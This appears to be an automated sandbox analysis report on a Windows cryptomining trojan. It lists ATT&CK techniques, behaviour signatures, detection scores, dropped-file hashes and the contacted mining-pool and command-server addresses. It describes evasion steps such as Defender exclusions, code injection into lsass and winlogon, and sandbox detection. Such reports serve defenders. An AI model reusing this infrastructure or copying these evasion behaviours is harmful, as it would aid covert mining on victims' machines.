          DLL Side-Loading          		LSA Secrets2
          Process Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          File Deletion          		Cached Domain Credentials131
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
          Rootkit          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Masquerading          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Modify Registry          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron131
          Virtualization/Sandbox Evasion          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
          Access Token Manipulation          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task713
          Process Injection          		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
          Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
          Hidden Files and Directories          		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584229 Sample: file.exe Startdate: 04/01/2025 Architecture: WINDOWS Score: 100 59 pool-fr.supportxmr.com 2->59 61 pool.supportxmr.com 2->61 63 198.187.3.20.in-addr.arpa 2->63 69 Malicious sample detected (through community Yara rule) 2->69 71 Multi AV Scanner detection for submitted file 2->71 73 Yara detected Xmrig cryptocurrency miner 2->73 75 10 other signatures 2->75 8 driver.exe 1 2->8         started        12 file.exe 1 2 2->12         started        signatures3 process4 file5 51 C:\Windows\Temp\ftnvuqwjtdwb.sys, PE32+ 8->51 dropped 77 Multi AV Scanner detection for dropped file 8->77 79 Modifies the context of a thread in another process (thread injection) 8->79 81 Adds a directory exclusion to Windows Defender 8->81 83 Sample is not signed and drops a device driver 8->83 14 dialer.exe 8->14         started        17 dialer.exe 8->17         started        20 powershell.exe 8->20         started        28 6 other processes 8->28 53 C:\ProgramData\IGaming\driver.exe, PE32+ 12->53 dropped 85 Uses powercfg.exe to modify the power settings 12->85 87 Modifies power options to not sleep / hibernate 12->87 22 dialer.exe 1 12->22         started        24 powershell.exe 23 12->24         started        26 cmd.exe 1 12->26         started        30 8 other processes 12->30 signatures6 process7 dnsIp8 89 Injects code into the Windows Explorer (explorer.exe) 14->89 91 Creates a thread in another existing process (thread injection) 14->91 93 Injects a PE file into a foreign processes 14->93 41 14 other processes 14->41 55 pool-fr.supportxmr.com 141.94.96.144, 49704, 8080 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 17->55 57 83.217.209.235, 49705, 57087, 57089 INF-NET-ASRU Russian Federation 17->57 95 Query firmware table information (likely to detect VMs) 17->95 97 Found strings related to Crypto-Mining 17->97 99 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 17->99 32 conhost.exe 20->32         started        101 Contains functionality to inject code into remote processes 22->101 103 Writes to foreign memory regions 22->103 105 Allocates memory in foreign processes 22->105 107 Contains functionality to compare user and computer (likely to detect sandboxes) 22->107 34 lsass.exe 22->34 injected 37 winlogon.exe 22->37 injected 43 2 other processes 22->43 109 Loading BitLocker PowerShell Module 24->109 39 conhost.exe 24->39         started        45 2 other processes 26->45 47 6 other processes 28->47 49 8 other processes 30->49 signatures9 111 Detected Stratum mining protocol 55->111 process10 signatures11 65 Installs new ROOT certificates 34->65 67 Writes to foreign memory regions 34->67

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          file.exe80%VirustotalBrowse
          file.exe82%ReversingLabsWin64.Trojan.MintZard

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\ProgramData\IGaming\driver.exe82%ReversingLabsWin64.Trojan.MintZard
          C:\Windows\Temp\ftnvuqwjtdwb.sys5%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php--c0%Avira URL Cloudsafe
          http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php)L0%Avira URL Cloudsafe
          https://172.94.1q0%Avira URL Cloudsafe
          http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpldn0%Avira URL Cloudsafe
          http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpo0%Avira URL Cloudsafe
          http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpaL(0%Avira URL Cloudsafe
          http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php0%Avira URL Cloudsafe
          http://3csp.icrosof4m/ocp00%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          pool-fr.supportxmr.com
          		141.94.96.144
          		truetrue
            		unknown
            pool.supportxmr.com
            		unknown
            		unknownfalse
              		high
              198.187.3.20.in-addr.arpa
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phptrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php--cdialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 0000001B.00000002.3372519545.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2121998643.00000140AD850000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpaL(dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://3csp.icrosof4m/ocp0lsass.exe, 0000001B.00000002.3380812837.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/wsdl/lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://172.94.1qdialer.exe, 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://xmrig.com/docs/algorithmsdialer.exe, 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
                              		high
                              http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpodialer.exe, 0000002D.00000002.3378194513.0000021C6D180000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 0000001B.00000002.3372519545.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2121998643.00000140AD850000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php)Ldialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpldndialer.exe, 0000002D.00000003.2147213918.0000021C6D181000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.microsvchost.exe, 00000035.00000002.3378496559.000001A204EE0000.00000002.00000001.00040000.00000000.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      141.94.96.144
                                      		pool-fr.supportxmr.comGermany
                                      		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue
                                      83.217.209.235
                                      		unknownRussian Federation
                                      		31514INF-NET-ASRUtrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1584229
                                      Start date and time:2025-01-04 22:57:11 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 10m 40s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:42
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:18
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.spyw.evad.mine.winEXE@62/72@2/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                      • Excluded IPs from analysis (whitelisted): 40.126.32.133, 40.126.32.74, 40.126.32.76, 20.190.160.17, 40.126.32.72, 40.126.32.136, 20.190.160.20, 20.190.160.22, 13.107.246.45, 4.175.87.197, 20.3.187.198, 20.12.23.50
                                      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      16:58:05API Interceptor1x Sleep call for process: file.exe modified
                                      16:58:06API Interceptor34x Sleep call for process: powershell.exe modified
                                      16:58:42API Interceptor306678x Sleep call for process: lsass.exe modified
                                      16:58:42API Interceptor383973x Sleep call for process: winlogon.exe modified
                                      16:58:43API Interceptor3369x Sleep call for process: svchost.exe modified
                                      16:58:45API Interceptor367857x Sleep call for process: dwm.exe modified
                                      16:58:48API Interceptor1834x Sleep call for process: dialer.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      141.94.96.144egFMhHSlmf.exeGet hashmaliciousXmrigBrowse
                                        kWYLtJ0Cn1.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                          FieroHack.exeGet hashmaliciousXmrigBrowse
                                            h2UFp4aCRq.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                              curriculum_vitae-copie.vbsGet hashmaliciousXmrigBrowse
                                                curriculum_vitae-copie_(1).vbsGet hashmaliciousXmrigBrowse
                                                  curriculum_vitae-copie.vbsGet hashmaliciousXmrigBrowse
                                                    Vsob3IooE7.exeGet hashmaliciousXmrigBrowse
                                                      GameBar.exeGet hashmaliciousXmrigBrowse
                                                        FTrondtloadws.exeGet hashmaliciousXmrigBrowse
                                                          83.217.209.235SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeGet hashmaliciousXmrigBrowse
                                                          • 83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          pool-fr.supportxmr.comSecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.71
                                                          file.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.71
                                                          egFMhHSlmf.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.71
                                                          xmr_linux_amd64 (2).elfGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.195
                                                          xmr_linux_amd64.elfGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.195
                                                          SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.144
                                                          Q3pEXxmWAD.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.195
                                                          file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                                          • 141.94.96.71
                                                          kWYLtJ0Cn1.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                          • 141.94.96.195
                                                          updater.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.71

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefuckunix.sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 141.27.79.124
                                                          fuckunix.arm.elfGet hashmaliciousMiraiBrowse
                                                          • 194.95.45.209
                                                          fuckunix.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 141.94.159.206
                                                          31.13.224.14-mips-2025-01-03T22_14_18.elfGet hashmaliciousMiraiBrowse
                                                          • 141.93.170.216
                                                          2.elfGet hashmaliciousUnknownBrowse
                                                          • 134.245.99.197
                                                          DEMONS.ppc.elfGet hashmaliciousUnknownBrowse
                                                          • 140.181.34.221
                                                          armv7l.elfGet hashmaliciousUnknownBrowse
                                                          • 141.33.21.24
                                                          armv4l.elfGet hashmaliciousUnknownBrowse
                                                          • 132.176.238.215
                                                          https://mmm.askfollow.us/#CRDGet hashmaliciousUnknownBrowse
                                                          • 141.95.98.65
                                                          https://t.co/YjyGioQuKTGet hashmaliciousUnknownBrowse
                                                          • 141.95.98.64
                                                          INF-NET-ASRUFantazy.mpsl.elfGet hashmaliciousUnknownBrowse
                                                          • 89.169.70.231
                                                          bot.mpsl.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                          • 89.169.4.44
                                                          bot.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 89.169.4.44
                                                          bot.ppc.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                          • 89.169.4.44
                                                          bot.sh4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                          • 89.169.4.44
                                                          bot.arm.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                          • 89.169.4.44
                                                          bot.x86_64.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                          • 89.169.4.44
                                                          bot.m68k.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                          • 89.169.4.44
                                                          bot.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                          • 89.169.4.44
                                                          bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                          • 89.169.4.44

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Windows\Temp\ftnvuqwjtdwb.syshiwA7Blv7C.exeGet hashmaliciousXmrigBrowse
                                                            5fr5gthkjdg71.exeGet hashmaliciousQuasar, R77 RootKitBrowse
                                                              aAcx14Rjtw.exeGet hashmaliciousXmrigBrowse
                                                                SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                  0Ty.png.exeGet hashmaliciousXmrigBrowse
                                                                    Qhx6a6VLAH.exeGet hashmaliciousXmrigBrowse
                                                                      88aext0k.exeGet hashmaliciousXmrigBrowse
                                                                        gaozw40v.exeGet hashmaliciousXmrigBrowse
                                                                          c2.exeGet hashmaliciousXmrigBrowse
                                                                            ldr.ps1Get hashmaliciousGO Miner, XmrigBrowse

                                                                              Created / dropped Files

                                                                              C:\ProgramData\IGaming\driver.exe

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2867712
                                                                              Entropy (8bit):6.540079343872506
                                                                              Encrypted:false
                                                                              SSDEEP:49152:U7N5o20VC8FlpAi4y/8t6x4EBka+Okl5lo5V5i7b6LR7QY6Vtnah:c2VCkxp8t69kBOtVebk6q
                                                                              MD5:A03484846E3418FFA2AB8AEC97A03E88
                                                                              SHA1:54C62C97DB8B0234EEB7A03D66B73F9D1DC22614
                                                                              SHA-256:6932616523C8080FD908D4B776F416A4D32653E657C2CBE75A42CDC0A8B5C4D1
                                                                              SHA-512:0F1661DD055E34CA4C8F37BCCF1AEE739BE12A1C6836C0AF00C0C156E59E363CE0C59F4B0E1402D4367A3D9E3BABC00AA5C7E512579F9295942150539103BA8F
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 82%
                                                                              Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d.....?g.........."......z...D+.....@..........@............................. ,...........`.....................................................<.............+...............,.x...............................(.......8...........X...X............................text...Vx.......z.................. ..`.rdata...............~..............@..@.data....++.......+.................@....pdata........+.......+.............@..@.00cfg........+.......+.............@..@.tls..........,.......+.............@....reloc..x.....,.......+.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1940658735648508
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlllul3nqth:NllUa
                                                                              MD5:851531B4FD612B0BC7891B3F401A478F
                                                                              SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                              SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                              SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                              Malicious:false
                                                                              Preview:@...e.................................&..............@..........

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkabvpkw.ntx.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r043ndhn.0jn.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ui3z5s3s.gdn.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y4ur20yo.jej.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:modified
                                                                              Size (bytes):4680
                                                                              Entropy (8bit):3.71089105613399
                                                                              Encrypted:false
                                                                              SSDEEP:96:pYMguQII4i546h4aGdinipV9ll7UY5HAmzQ+:9A4i/xne7HO+
                                                                              MD5:D4EE2FEE0CAA590CB6CE9C7A24792B0E
                                                                              SHA1:3A7810748C7E1BC45DA8020E3595EB6EEE86E63A
                                                                              SHA-256:DF3CCEF56BEFA71A015CCE3F704C4618FADBCA8F89C439B1D960FB77A9B60FBF
                                                                              SHA-512:033E00B6CAA58E746AC441B80672E0674A725B3556289B1044CCC51F98DEA6794A4EA96F0D2026A2C79CBDBD8F53B67861B9D4791393F7E25C2E43854A1B4FAD
                                                                              Malicious:false
                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...6.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.1.).<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.R.e.s.t.a.r.t.T.a.s.k.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.B.A.).

